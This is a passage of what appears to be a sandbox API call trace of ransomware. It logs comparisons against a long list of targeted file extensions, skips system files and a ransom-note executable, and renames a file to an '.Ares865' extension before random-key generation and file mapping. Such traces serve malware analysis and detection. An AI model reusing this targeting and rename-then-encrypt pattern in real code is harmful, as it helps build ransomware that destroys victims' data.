returned 3 [0063.462] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.462] lstrlenW (lpString="odb") returned 3 [0063.462] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.462] lstrlenW (lpString="oqy") returned 3 [0063.462] lstrcmpiW (lpString1="htm", lpString2="oqy") returned -1 [0063.462] lstrlenW (lpString="ora") returned 3 [0063.462] lstrcmpiW (lpString1="htm", lpString2="ora") returned -1 [0063.462] lstrlenW (lpString="orx") returned 3 [0063.462] lstrcmpiW (lpString1="htm", lpString2="orx") returned -1 [0063.462] lstrlenW (lpString="owc") returned 3 [0063.462] lstrcmpiW (lpString1="htm", lpString2="owc") returned -1 [0063.462] lstrlenW (lpString="p96") returned 3 [0063.462] lstrcmpiW (lpString1="htm", lpString2="p96") returned -1 [0063.462] lstrlenW (lpString="p97") returned 3 [0063.462] lstrcmpiW (lpString1="htm", lpString2="p97") returned -1 [0063.462] lstrlenW (lpString="pan") returned 3 [0063.462] lstrcmpiW (lpString1="htm", lpString2="pan") returned -1 [0063.462] lstrlenW (lpString="pdb") returned 3 [0063.462] lstrcmpiW (lpString1="htm", lpString2="pdb") returned -1 [0063.462] lstrlenW (lpString="pdm") returned 3 [0063.462] lstrcmpiW (lpString1="htm", lpString2="pdm") returned -1 [0063.462] lstrlenW (lpString="pnz") returned 3 [0063.462] lstrcmpiW (lpString1="htm", lpString2="pnz") returned -1 [0063.462] lstrlenW (lpString="qry") returned 3 [0063.462] lstrcmpiW (lpString1="htm", lpString2="qry") returned -1 [0063.462] lstrlenW (lpString="qvd") returned 3 [0063.462] lstrcmpiW (lpString1="htm", lpString2="qvd") returned -1 [0063.462] lstrlenW (lpString="rbf") returned 3 [0063.463] lstrcmpiW (lpString1="htm", lpString2="rbf") returned -1 [0063.463] lstrlenW (lpString="rctd") returned 4 [0063.463] lstrcmpiW (lpString1=".htm", lpString2="rctd") returned -1 [0063.463] lstrlenW (lpString="rod") returned 3 [0063.463] lstrcmpiW (lpString1="htm", lpString2="rod") returned -1 [0063.463] lstrlenW (lpString="rodx") returned 4 [0063.463] lstrcmpiW (lpString1=".htm", lpString2="rodx") returned -1 [0063.463] lstrlenW (lpString="rpd") returned 3 [0063.463] lstrcmpiW (lpString1="htm", lpString2="rpd") returned -1 [0063.463] lstrlenW (lpString="rsd") returned 3 [0063.463] lstrcmpiW (lpString1="htm", lpString2="rsd") returned -1 [0063.463] lstrlenW (lpString="sas7bdat") returned 8 [0063.463] lstrcmpiW (lpString1="bles.htm", lpString2="sas7bdat") returned -1 [0063.463] lstrlenW (lpString="sbf") returned 3 [0063.463] lstrcmpiW (lpString1="htm", lpString2="sbf") returned -1 [0063.463] lstrlenW (lpString="scx") returned 3 [0063.463] lstrcmpiW (lpString1="htm", lpString2="scx") returned -1 [0063.463] lstrlenW (lpString="sdb") returned 3 [0063.463] lstrcmpiW (lpString1="htm", lpString2="sdb") returned -1 [0063.463] lstrlenW (lpString="sdc") returned 3 [0063.463] lstrcmpiW (lpString1="htm", lpString2="sdc") returned -1 [0063.463] lstrlenW (lpString="sdf") returned 3 [0063.463] lstrcmpiW (lpString1="htm", lpString2="sdf") returned -1 [0063.463] lstrlenW (lpString="sis") returned 3 [0063.463] lstrcmpiW (lpString1="htm", lpString2="sis") returned -1 [0063.463] lstrlenW (lpString="spq") returned 3 [0063.463] lstrcmpiW (lpString1="htm", lpString2="spq") returned -1 [0063.463] lstrlenW (lpString="te") returned 2 [0063.463] lstrcmpiW (lpString1="tm", lpString2="te") returned 1 [0063.463] lstrlenW (lpString="teacher") returned 7 [0063.463] lstrcmpiW (lpString1="les.htm", lpString2="teacher") returned -1 [0063.463] lstrlenW (lpString="tmd") returned 3 [0063.463] lstrcmpiW (lpString1="htm", lpString2="tmd") returned -1 [0063.463] lstrlenW (lpString="tps") returned 3 [0063.463] lstrcmpiW (lpString1="htm", lpString2="tps") returned -1 [0063.463] lstrlenW (lpString="trc") returned 3 [0063.463] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.464] lstrlenW (lpString="trc") returned 3 [0063.464] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.464] lstrlenW (lpString="trm") returned 3 [0063.464] lstrcmpiW (lpString1="htm", lpString2="trm") returned -1 [0063.464] lstrlenW (lpString="udb") returned 3 [0063.464] lstrcmpiW (lpString1="htm", lpString2="udb") returned -1 [0063.464] lstrlenW (lpString="udl") returned 3 [0063.464] lstrcmpiW (lpString1="htm", lpString2="udl") returned -1 [0063.464] lstrlenW (lpString="usr") returned 3 [0063.464] lstrcmpiW (lpString1="htm", lpString2="usr") returned -1 [0063.464] lstrlenW (lpString="v12") returned 3 [0063.464] lstrcmpiW (lpString1="htm", lpString2="v12") returned -1 [0063.464] lstrlenW (lpString="vis") returned 3 [0063.464] lstrcmpiW (lpString1="htm", lpString2="vis") returned -1 [0063.464] lstrlenW (lpString="vpd") returned 3 [0063.464] lstrcmpiW (lpString1="htm", lpString2="vpd") returned -1 [0063.464] lstrlenW (lpString="vvv") returned 3 [0063.464] lstrcmpiW (lpString1="htm", lpString2="vvv") returned -1 [0063.464] lstrlenW (lpString="wdb") returned 3 [0063.464] lstrcmpiW (lpString1="htm", lpString2="wdb") returned -1 [0063.464] lstrlenW (lpString="wmdb") returned 4 [0063.464] lstrcmpiW (lpString1=".htm", lpString2="wmdb") returned -1 [0063.464] lstrlenW (lpString="wrk") returned 3 [0063.464] lstrcmpiW (lpString1="htm", lpString2="wrk") returned -1 [0063.464] lstrlenW (lpString="xdb") returned 3 [0063.464] lstrcmpiW (lpString1="htm", lpString2="xdb") returned -1 [0063.464] lstrlenW (lpString="xld") returned 3 [0063.464] lstrcmpiW (lpString1="htm", lpString2="xld") returned -1 [0063.464] lstrlenW (lpString="xmlff") returned 5 [0063.464] lstrcmpiW (lpString1="s.htm", lpString2="xmlff") returned -1 [0063.464] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.Ares865") returned 96 [0063.464] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\green bubbles.htm"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\green bubbles.htm.ares865"), dwFlags=0x1) returned 1 [0063.465] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\green bubbles.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.466] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=237) returned 1 [0063.466] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.466] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.466] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.466] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.467] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.467] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.467] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f0, lpName=0x0) returned 0x164 [0063.469] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f0) returned 0x190000 [0063.469] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.470] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.470] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.470] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.470] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.470] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.470] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.470] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0063.471] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.471] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0063.471] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.471] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.471] CloseHandle (hObject=0x164) returned 1 [0063.471] CloseHandle (hObject=0x154) returned 1 [0063.471] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.471] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.471] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.471] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaa436a95, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1906, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GreenBubbles.jpg", cAlternateFileName="GREENB~1.JPG")) returned 1 [0063.471] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0063.471] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="aoldtz.exe") returned 1 [0063.471] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2=".") returned 1 [0063.471] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="..") returned 1 [0063.471] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="windows") returned -1 [0063.471] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="bootmgr") returned 1 [0063.471] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="temp") returned -1 [0063.471] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="pagefile.sys") returned -1 [0063.471] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="boot") returned 1 [0063.472] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="ids.txt") returned -1 [0063.472] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="ntuser.dat") returned -1 [0063.472] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="perflogs") returned -1 [0063.472] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="MSBuild") returned -1 [0063.472] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0063.472] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 88 [0063.472] lstrcpyW (in: lpString1=0x2cce48e, lpString2="GreenBubbles.jpg" | out: lpString1="GreenBubbles.jpg") returned="GreenBubbles.jpg" [0063.472] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0063.472] lstrlenW (lpString="Ares865") returned 7 [0063.472] lstrcmpiW (lpString1="les.jpg", lpString2="Ares865") returned 1 [0063.472] lstrlenW (lpString=".dll") returned 4 [0063.472] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2=".dll") returned 1 [0063.472] lstrlenW (lpString=".lnk") returned 4 [0063.472] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2=".lnk") returned 1 [0063.472] lstrlenW (lpString=".ini") returned 4 [0063.472] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2=".ini") returned 1 [0063.472] lstrlenW (lpString=".sys") returned 4 [0063.472] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2=".sys") returned 1 [0063.472] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0063.472] lstrlenW (lpString="bak") returned 3 [0063.472] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0063.472] lstrlenW (lpString="ba_") returned 3 [0063.472] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0063.472] lstrlenW (lpString="dbb") returned 3 [0063.472] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0063.472] lstrlenW (lpString="vmdk") returned 4 [0063.472] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0063.472] lstrlenW (lpString="rar") returned 3 [0063.472] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0063.472] lstrlenW (lpString="zip") returned 3 [0063.472] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0063.472] lstrlenW (lpString="tgz") returned 3 [0063.472] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0063.472] lstrlenW (lpString="vbox") returned 4 [0063.472] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0063.472] lstrlenW (lpString="vdi") returned 3 [0063.472] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0063.473] lstrlenW (lpString="vhd") returned 3 [0063.473] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0063.473] lstrlenW (lpString="vhdx") returned 4 [0063.473] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0063.473] lstrlenW (lpString="avhd") returned 4 [0063.473] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0063.473] lstrlenW (lpString="db") returned 2 [0063.473] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0063.473] lstrlenW (lpString="db2") returned 3 [0063.473] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0063.473] lstrlenW (lpString="db3") returned 3 [0063.473] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0063.473] lstrlenW (lpString="dbf") returned 3 [0063.473] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0063.473] lstrlenW (lpString="mdf") returned 3 [0063.473] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0063.473] lstrlenW (lpString="mdb") returned 3 [0063.473] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0063.473] lstrlenW (lpString="sql") returned 3 [0063.473] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0063.473] lstrlenW (lpString="sqlite") returned 6 [0063.473] lstrcmpiW (lpString1="es.jpg", lpString2="sqlite") returned -1 [0063.473] lstrlenW (lpString="sqlite3") returned 7 [0063.473] lstrcmpiW (lpString1="les.jpg", lpString2="sqlite3") returned -1 [0063.473] lstrlenW (lpString="sqlitedb") returned 8 [0063.473] lstrcmpiW (lpString1="bles.jpg", lpString2="sqlitedb") returned -1 [0063.473] lstrlenW (lpString="xml") returned 3 [0063.473] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0063.473] lstrlenW (lpString="$er") returned 3 [0063.473] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0063.473] lstrlenW (lpString="4dd") returned 3 [0063.473] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0063.473] lstrlenW (lpString="4dl") returned 3 [0063.473] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0063.473] lstrlenW (lpString="^^^") returned 3 [0063.473] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0063.473] lstrlenW (lpString="abs") returned 3 [0063.474] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0063.474] lstrlenW (lpString="abx") returned 3 [0063.474] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0063.474] lstrlenW (lpString="accdb") returned 5 [0063.474] lstrcmpiW (lpString1="s.jpg", lpString2="accdb") returned 1 [0063.474] lstrlenW (lpString="accdc") returned 5 [0063.474] lstrcmpiW (lpString1="s.jpg", lpString2="accdc") returned 1 [0063.474] lstrlenW (lpString="accde") returned 5 [0063.474] lstrcmpiW (lpString1="s.jpg", lpString2="accde") returned 1 [0063.474] lstrlenW (lpString="accdr") returned 5 [0063.474] lstrcmpiW (lpString1="s.jpg", lpString2="accdr") returned 1 [0063.474] lstrlenW (lpString="accdt") returned 5 [0063.474] lstrcmpiW (lpString1="s.jpg", lpString2="accdt") returned 1 [0063.474] lstrlenW (lpString="accdw") returned 5 [0063.474] lstrcmpiW (lpString1="s.jpg", lpString2="accdw") returned 1 [0063.474] lstrlenW (lpString="accft") returned 5 [0063.474] lstrcmpiW (lpString1="s.jpg", lpString2="accft") returned 1 [0063.474] lstrlenW (lpString="adb") returned 3 [0063.474] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.474] lstrlenW (lpString="adb") returned 3 [0063.474] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.474] lstrlenW (lpString="ade") returned 3 [0063.474] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0063.474] lstrlenW (lpString="adf") returned 3 [0063.474] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0063.474] lstrlenW (lpString="adn") returned 3 [0063.474] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0063.474] lstrlenW (lpString="adp") returned 3 [0063.474] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0063.474] lstrlenW (lpString="alf") returned 3 [0063.474] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0063.474] lstrlenW (lpString="ask") returned 3 [0063.474] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0063.474] lstrlenW (lpString="btr") returned 3 [0063.474] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0063.474] lstrlenW (lpString="cat") returned 3 [0063.474] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0063.475] lstrlenW (lpString="cdb") returned 3 [0063.475] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0063.475] lstrlenW (lpString="ckp") returned 3 [0063.475] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0063.475] lstrlenW (lpString="cma") returned 3 [0063.475] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0063.475] lstrlenW (lpString="cpd") returned 3 [0063.475] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0063.475] lstrlenW (lpString="dacpac") returned 6 [0063.475] lstrcmpiW (lpString1="es.jpg", lpString2="dacpac") returned 1 [0063.475] lstrlenW (lpString="dad") returned 3 [0063.475] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0063.475] lstrlenW (lpString="dadiagrams") returned 10 [0063.475] lstrcmpiW (lpString1="ubbles.jpg", lpString2="dadiagrams") returned 1 [0063.475] lstrlenW (lpString="daschema") returned 8 [0063.475] lstrcmpiW (lpString1="bles.jpg", lpString2="daschema") returned -1 [0063.475] lstrlenW (lpString="db-journal") returned 10 [0063.475] lstrcmpiW (lpString1="ubbles.jpg", lpString2="db-journal") returned 1 [0063.475] lstrlenW (lpString="db-shm") returned 6 [0063.475] lstrcmpiW (lpString1="es.jpg", lpString2="db-shm") returned 1 [0063.475] lstrlenW (lpString="db-wal") returned 6 [0063.475] lstrcmpiW (lpString1="es.jpg", lpString2="db-wal") returned 1 [0063.475] lstrlenW (lpString="dbc") returned 3 [0063.475] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0063.475] lstrlenW (lpString="dbs") returned 3 [0063.475] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0063.475] lstrlenW (lpString="dbt") returned 3 [0063.475] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0063.475] lstrlenW (lpString="dbv") returned 3 [0063.475] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0063.475] lstrlenW (lpString="dbx") returned 3 [0063.475] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0063.475] lstrlenW (lpString="dcb") returned 3 [0063.475] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0063.475] lstrlenW (lpString="dct") returned 3 [0063.475] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0063.475] lstrlenW (lpString="dcx") returned 3 [0063.476] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0063.476] lstrlenW (lpString="ddl") returned 3 [0063.476] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0063.476] lstrlenW (lpString="dlis") returned 4 [0063.476] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0063.476] lstrlenW (lpString="dp1") returned 3 [0063.476] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0063.476] lstrlenW (lpString="dqy") returned 3 [0063.476] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0063.476] lstrlenW (lpString="dsk") returned 3 [0063.476] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0063.476] lstrlenW (lpString="dsn") returned 3 [0063.476] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0063.476] lstrlenW (lpString="dtsx") returned 4 [0063.476] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0063.476] lstrlenW (lpString="dxl") returned 3 [0063.476] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0063.476] lstrlenW (lpString="eco") returned 3 [0063.476] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0063.476] lstrlenW (lpString="ecx") returned 3 [0063.476] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0063.476] lstrlenW (lpString="edb") returned 3 [0063.476] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0063.476] lstrlenW (lpString="epim") returned 4 [0063.476] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0063.476] lstrlenW (lpString="fcd") returned 3 [0063.476] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0063.476] lstrlenW (lpString="fdb") returned 3 [0063.476] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0063.476] lstrlenW (lpString="fic") returned 3 [0063.476] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0063.476] lstrlenW (lpString="flexolibrary") returned 12 [0063.476] lstrcmpiW (lpString1="nBubbles.jpg", lpString2="flexolibrary") returned 1 [0063.476] lstrlenW (lpString="fm5") returned 3 [0063.476] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0063.476] lstrlenW (lpString="fmp") returned 3 [0063.476] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0063.477] lstrlenW (lpString="fmp12") returned 5 [0063.477] lstrcmpiW (lpString1="s.jpg", lpString2="fmp12") returned 1 [0063.477] lstrlenW (lpString="fmpsl") returned 5 [0063.477] lstrcmpiW (lpString1="s.jpg", lpString2="fmpsl") returned 1 [0063.477] lstrlenW (lpString="fol") returned 3 [0063.477] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0063.477] lstrlenW (lpString="fp3") returned 3 [0063.477] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0063.477] lstrlenW (lpString="fp4") returned 3 [0063.477] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0063.477] lstrlenW (lpString="fp5") returned 3 [0063.477] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0063.477] lstrlenW (lpString="fp7") returned 3 [0063.477] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0063.477] lstrlenW (lpString="fpt") returned 3 [0063.477] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0063.477] lstrlenW (lpString="frm") returned 3 [0063.477] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0063.477] lstrlenW (lpString="gdb") returned 3 [0063.477] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.477] lstrlenW (lpString="gdb") returned 3 [0063.477] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.477] lstrlenW (lpString="grdb") returned 4 [0063.477] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0063.477] lstrlenW (lpString="gwi") returned 3 [0063.477] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0063.477] lstrlenW (lpString="hdb") returned 3 [0063.477] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0063.477] lstrlenW (lpString="his") returned 3 [0063.477] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0063.477] lstrlenW (lpString="ib") returned 2 [0063.477] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0063.477] lstrlenW (lpString="idb") returned 3 [0063.477] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0063.477] lstrlenW (lpString="ihx") returned 3 [0063.477] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0063.477] lstrlenW (lpString="itdb") returned 4 [0063.478] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0063.478] lstrlenW (lpString="itw") returned 3 [0063.478] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0063.478] lstrlenW (lpString="jet") returned 3 [0063.478] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0063.478] lstrlenW (lpString="jtx") returned 3 [0063.478] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0063.478] lstrlenW (lpString="kdb") returned 3 [0063.478] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0063.478] lstrlenW (lpString="kexi") returned 4 [0063.478] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0063.478] lstrlenW (lpString="kexic") returned 5 [0063.478] lstrcmpiW (lpString1="s.jpg", lpString2="kexic") returned 1 [0063.478] lstrlenW (lpString="kexis") returned 5 [0063.478] lstrcmpiW (lpString1="s.jpg", lpString2="kexis") returned 1 [0063.478] lstrlenW (lpString="lgc") returned 3 [0063.478] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0063.478] lstrlenW (lpString="lwx") returned 3 [0063.478] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0063.478] lstrlenW (lpString="maf") returned 3 [0063.478] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0063.478] lstrlenW (lpString="maq") returned 3 [0063.478] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0063.478] lstrlenW (lpString="mar") returned 3 [0063.478] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0063.478] lstrlenW (lpString="marshal") returned 7 [0063.478] lstrcmpiW (lpString1="les.jpg", lpString2="marshal") returned -1 [0063.478] lstrlenW (lpString="mas") returned 3 [0063.478] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0063.478] lstrlenW (lpString="mav") returned 3 [0063.478] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0063.478] lstrlenW (lpString="maw") returned 3 [0063.478] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0063.478] lstrlenW (lpString="mdbhtml") returned 7 [0063.478] lstrcmpiW (lpString1="les.jpg", lpString2="mdbhtml") returned -1 [0063.478] lstrlenW (lpString="mdn") returned 3 [0063.479] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0063.479] lstrlenW (lpString="mdt") returned 3 [0063.479] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0063.479] lstrlenW (lpString="mfd") returned 3 [0063.479] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0063.479] lstrlenW (lpString="mpd") returned 3 [0063.479] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0063.479] lstrlenW (lpString="mrg") returned 3 [0063.479] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0063.479] lstrlenW (lpString="mud") returned 3 [0063.479] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0063.479] lstrlenW (lpString="mwb") returned 3 [0063.479] lstrcmpiW (lpString1="jpg", 